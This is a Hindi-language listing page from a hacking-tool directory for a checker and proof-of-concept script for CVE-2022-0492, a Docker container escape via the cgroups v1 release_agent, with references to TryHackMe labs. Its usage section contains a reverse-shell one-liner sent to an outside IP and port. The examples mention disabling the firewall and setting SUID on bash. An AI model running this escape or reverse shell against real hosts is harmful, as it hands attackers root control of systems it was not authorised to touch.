Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-0492-Docker-Breakout-Checker-and-PoC — Docker Breakout Checker और PoC CAP_SYS_ADMIN के माध्यम से और user namespaces के माध्यम से (CVE-2022-0492) | Kitploit
उपकरण/GitHubGitHub/t1erno/cve-2022-0492-docker-breakout-checker-and-poc
विशेषाधिकार वृद्धिकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षालर्निंग और शिक्षाकंटेनर एस्केपलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubt1erno/cve-2022-0492-docker-breakout-checker-and-poc

CVE-2022-0492-Docker-Breakout-Checker-and-PoC

Docker Breakout Checker और PoC CAP_SYS_ADMIN के माध्यम से और user namespaces के माध्यम से (CVE-2022-0492)

रिपॉजिटरी देखें
8173 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-0492 Docker ब्रेकआउट चेकर और PoC

सारांश

इस कमजोरी का शोषण करने के लिए हमलावर को एक असुरक्षित सिस्टम पर चल रहे Docker कंटेनर तक पहुंच की आवश्यकता होती है। एक बार शोषण के बाद, हमलावर कंटेनर से बाहर निकल सकता है और होस्ट सिस्टम पर पूर्ण नियंत्रण प्राप्त कर सकता है।

Linux कर्नेल के kernel/cgroup/cgroup-v1.c फंक्शन में cgroup_release_agent_write में एक कमजोरी पाई गई। यह दोष, कुछ परिस्थितियों में, विशेषाधिकारों को बढ़ाने और नेमस्पेस अलगाव को अप्रत्याशित रूप से बायपास करने के लिए cgroups v1 release_agent सुविधा का उपयोग करने की अनुमति देता है।

सरल शब्दों में, cgroups v1 में release_agent नामक एक सुविधा है जो cgroup में एक प्रक्रिया समाप्त होने पर एक प्रोग्राम चलाती है। यदि notify_on_release सक्षम है, तो कर्नेल release_agent बाइनरी को root के रूप में चलाता है। release_agent फ़ाइल को संपादित करके, एक हमलावर अपनी बाइनरी को उन्नत विशेषाधिकारों के साथ निष्पादित कर सकता है, सिस्टम का नियंत्रण ले सकता है। हालांकि, release_agent फ़ाइल root के स्वामित्व में है, इसलिए केवल root पहुंच वाला उपयोगकर्ता ही इसे संशोधित कर सकता है।

उपयोग

root@kitploit:~
# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh CVE-2022-0492.sh    --checker                Verify if system is vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Execute command on host machine.
        sh CVE-2022-0492.sh -h|--help                   Print the help panel.

[>] Example:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

उदाहरण

Hamlet TryHackMe से

होस्ट मशीन में रूट उपयोगकर्ता UFW को अक्षम करके और फिर एक रिवर्स शेल भेजकर हैक किया गया।

Misguided Ghosts TryHackMe से

होस्ट मशीन में रूट उपयोगकर्ता bash पर SUID सेट करके और फिर रिवर्स शेल भेजकर हैक किया गया।

स्रोत:

  • https://github.com/puckiestyle/CVE-2022-0492
  • http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492
टूल डाउनलोड करें